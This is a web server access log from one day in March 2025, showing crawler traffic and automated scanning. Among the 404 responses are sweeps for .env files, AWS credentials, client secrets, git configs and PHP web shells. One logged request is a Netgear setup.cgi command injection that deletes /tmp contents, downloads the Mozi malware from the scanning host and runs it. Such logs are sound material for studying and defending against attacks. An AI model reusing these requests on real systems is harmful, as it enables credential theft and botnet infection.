156.59.198.135 - - [01/Mar/2025:09:54:50 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001854.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
122.116.21.91 - - [01/Mar/2025:10:06:30 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
193.68.89.10 - - [01/Mar/2025:10:08:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [01/Mar/2025:10:15:36 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11036975.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:10:19:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10309968.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
204.76.203.15 - - [01/Mar/2025:10:20:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [01/Mar/2025:10:23:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104281103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
191.103.81.162 - - [01/Mar/2025:10:25:57 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
156.59.198.135 - - [01/Mar/2025:10:42:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107151003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.127.84.223 - - [01/Mar/2025:10:42:22 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
117.203.135.97 - - [01/Mar/2025:10:48:59 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
220.134.93.244 - - [01/Mar/2025:10:49:00 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [01/Mar/2025:11:15:38 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115990.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.203 - - [01/Mar/2025:11:26:12 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
78.153.140.203 - - [01/Mar/2025:11:26:12 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.203 - - [01/Mar/2025:11:26:14 +0100] "GET /web/debug/default/view HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.42 Safari/525.19"
78.153.140.203 - - [01/Mar/2025:11:26:15 +0100] "GET /server/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3"
78.153.140.203 - - [01/Mar/2025:11:26:16 +0100] "GET /media/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Android 6.0.1; Mobile; rv:43.0) Gecko/43.0 Firefox/43.0"
78.153.140.203 - - [01/Mar/2025:11:26:38 +0100] "GET /config/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729)"
78.153.140.203 - - [01/Mar/2025:11:26:56 +0100] "GET /web/.env HTTP/1.1" 404 353 "-" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10"
207.180.230.127 - - [01/Mar/2025:11:27:06 +0100] "GET //adminfuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:10 +0100] "GET //tempfuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:14 +0100] "GET //thoms.php HTTP/1.1" 404 294 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:15 +0100] "GET /.env.local HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:19 +0100] "GET //classfuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:23 +0100] "GET //userfuns.php HTTP/1.1" 404 296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:24 +0100] "GET /html/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; EIE10;ENUSMCM; rv:11.0) like Gecko"
207.180.230.127 - - [01/Mar/2025:11:27:27 +0100] "GET //wp-content/hplfuns.php HTTP/1.1" 404 303 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:31 +0100] "GET /production/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; Android 5.0; BLU STUDIO C 5+5 Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Mobile Safari/537.36 OPR/29.0.1809.91837"
207.180.230.127 - - [01/Mar/2025:11:27:32 +0100] "GET //wp-content/termps.php HTTP/1.1" 404 302 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:36 +0100] "GET //termps.php HTTP/1.1" 404 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:40 +0100] "GET /upload/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; SAMSUNG GT-S5360T Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
207.180.230.127 - - [01/Mar/2025:11:27:40 +0100] "GET //inputs.php HTTP/1.1" 404 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:45 +0100] "GET //connects.php HTTP/1.1" 404 296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:46 +0100] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 371 "-" "Opera/6.05 (Windows ME; U) [de]"
207.180.230.127 - - [01/Mar/2025:11:27:49 +0100] "GET //hplfuns.php HTTP/1.1" 404 296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
207.180.230.127 - - [01/Mar/2025:11:27:53 +0100] "GET //filefuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:27:57 +0100] "GET /twilio/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.54"
78.153.140.203 - - [01/Mar/2025:11:28:03 +0100] "GET /.config.yaml HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Superbird/28.0.1500.71 Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:28:06 +0100] "GET /?url=.env HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1 Safari/534.50"
78.153.140.203 - - [01/Mar/2025:11:28:09 +0100] "GET /data/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.2.1; en-us; M470BSA Build/JOP40D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.203 - - [01/Mar/2025:11:28:21 +0100] "GET /docs/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061202 Firefox/2.0"
78.153.140.203 - - [01/Mar/2025:11:28:22 +0100] "GET /inc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
78.153.140.203 - - [01/Mar/2025:11:28:27 +0100] "GET /misc/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.59 Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:28:32 +0100] "GET /cms/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; myTouch4G Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.203 - - [01/Mar/2025:11:28:35 +0100] "GET /twilio.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; C5155 Build/IML77) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.203 - - [01/Mar/2025:11:28:37 +0100] "GET /include/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6"
78.153.140.203 - - [01/Mar/2025:11:28:39 +0100] "GET /beta/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2"
78.153.140.203 - - [01/Mar/2025:11:28:41 +0100] "GET /Config/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2687.0 Safari/537.36 OPR/38.0.2205.0 (Edition developer)"
78.153.140.203 - - [01/Mar/2025:11:28:41 +0100] "GET /path/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
78.153.140.203 - - [01/Mar/2025:11:28:41 +0100] "GET /public/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.43"
78.153.140.203 - - [01/Mar/2025:11:28:41 +0100] "GET /client_secrets.json HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
78.153.140.203 - - [01/Mar/2025:11:28:41 +0100] "GET /frontend/web/debug/default/view HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10"
78.153.140.203 - - [01/Mar/2025:11:28:43 +0100] "GET /library/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; SLCC2; Media Center PC 6.0; Tablet PC 2.0; EIE10;ENUSWOL)"
78.153.140.203 - - [01/Mar/2025:11:28:43 +0100] "GET /pinfo.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0"
78.153.140.203 - - [01/Mar/2025:11:28:43 +0100] "GET /infos.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
78.153.140.203 - - [01/Mar/2025:11:28:43 +0100] "GET /.env.testing HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
78.153.140.203 - - [01/Mar/2025:11:28:43 +0100] "GET /cms/.env.production HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Mobile; OPENC; rv:28.0) Gecko/28.0 Firefox/28.0"
78.153.140.203 - - [01/Mar/2025:11:28:44 +0100] "GET /download/.env HTTP/1.1" 404 358 "-" "Opera/9.63 (X11; Linux i686; U; de) Presto/2.1.1"
78.153.140.203 - - [01/Mar/2025:11:28:44 +0100] "GET /shared/.env HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)"
78.153.140.203 - - [01/Mar/2025:11:28:44 +0100] "GET /Api/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MDDS; AskTbORJ/5.15.25.36191; BOIE9;ENUS)"
78.153.140.203 - - [01/Mar/2025:11:28:44 +0100] "GET /doc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
78.153.140.203 - - [01/Mar/2025:11:28:45 +0100] "GET /Laravel/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 4.5; Windows 98; )"
78.153.140.203 - - [01/Mar/2025:11:28:46 +0100] "GET /auth/.env HTTP/1.1" 404 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; Tablet PC 2.0)"
78.153.140.203 - - [01/Mar/2025:11:28:46 +0100] "GET /bot/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)"
78.153.140.203 - - [01/Mar/2025:11:28:46 +0100] "GET /.ENV HTTP/1.1" 404 349 "-" "Mozilla/5.0 (iPhone Simulator; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3"
78.153.140.203 - - [01/Mar/2025:11:28:47 +0100] "GET /repo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34"
78.153.140.203 - - [01/Mar/2025:11:28:47 +0100] "GET /.AWS/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; Linux amd64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1"
4.156.236.150 - - [01/Mar/2025:11:38:06 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
193.68.89.10 - - [01/Mar/2025:11:50:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.117.35.114 - - [01/Mar/2025:11:57:32 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [01/Mar/2025:12:01:14 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11549123.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:12:08:58 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969025.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:12:12:59 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909061103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:12:16:59 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114982.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.128.47 - - [01/Mar/2025:12:26:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.38.23.16 - - [01/Mar/2025:12:39:45 +0100] "GET /wp-content/themes/holding_pattern/admin/options-tab-sample.txt HTTP/1.1" 404 414 "-" "ALittle Client"
194.38.23.16 - - [01/Mar/2025:12:39:49 +0100] "GET /wp-content/themes/holding_pattern/admin/options-tab-sample.txt HTTP/1.1" 404 427 "-" "ALittle Client"
185.242.226.116 - - [01/Mar/2025:12:42:28 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [01/Mar/2025:12:42:28 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
123.10.59.37 - - [01/Mar/2025:12:52:34 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.10.59.37:32955/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
156.59.198.135 - - [01/Mar/2025:12:52:52 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11306565.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [01/Mar/2025:12:57:22 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
114.119.158.189 - - [01/Mar/2025:12:58:21 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.31 - - [01/Mar/2025:12:59:46 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
184.105.247.195 - - [01/Mar/2025:13:02:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"
156.59.198.135 - - [01/Mar/2025:13:02:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001025.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [01/Mar/2025:13:03:48 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
184.105.247.195 - - [01/Mar/2025:13:05:44 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
184.105.247.195 - - [01/Mar/2025:13:06:18 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"
156.59.198.136 - - [01/Mar/2025:13:06:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201907261303_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.105.247.195 - - [01/Mar/2025:13:06:55 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"
184.105.247.195 - - [01/Mar/2025:13:06:58 +0100] "GET /phpinfo.php HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"
184.105.247.195 - - [01/Mar/2025:13:07:00 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
114.119.140.38 - - [01/Mar/2025:13:14:34 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.129.4 - - [01/Mar/2025:13:14:45 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
156.59.198.136 - - [01/Mar/2025:13:20:37 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10424359.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [01/Mar/2025:13:31:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /media../.git/config HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /.env.ci HTTP/1.1" 404 282 "-" "l9explore/1.2.2"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /.env.local HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /api/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /.env.save HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
195.178.110.163 - - [01/Mar/2025:13:40:15 +0100] "GET /settings/.env HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
141.255.166.90 - - [01/Mar/2025:13:43:38 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
109.236.61.115 - - [01/Mar/2025:13:49:35 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
147.185.133.134 - - [01/Mar/2025:14:07:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
119.203.163.162 - - [01/Mar/2025:14:10:04 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
194.165.16.161 - - [01/Mar/2025:14:15:21 +0100] "\x03" 400 383 "-" "-"
156.59.198.136 - - [01/Mar/2025:14:18:52 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111241203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.89.148.177 - - [01/Mar/2025:14:33:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C) FirePHP/0.5"
156.59.198.135 - - [01/Mar/2025:14:49:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110141403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.210 - - [01/Mar/2025:15:07:53 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
156.59.198.136 - - [01/Mar/2025:15:08:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908171103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
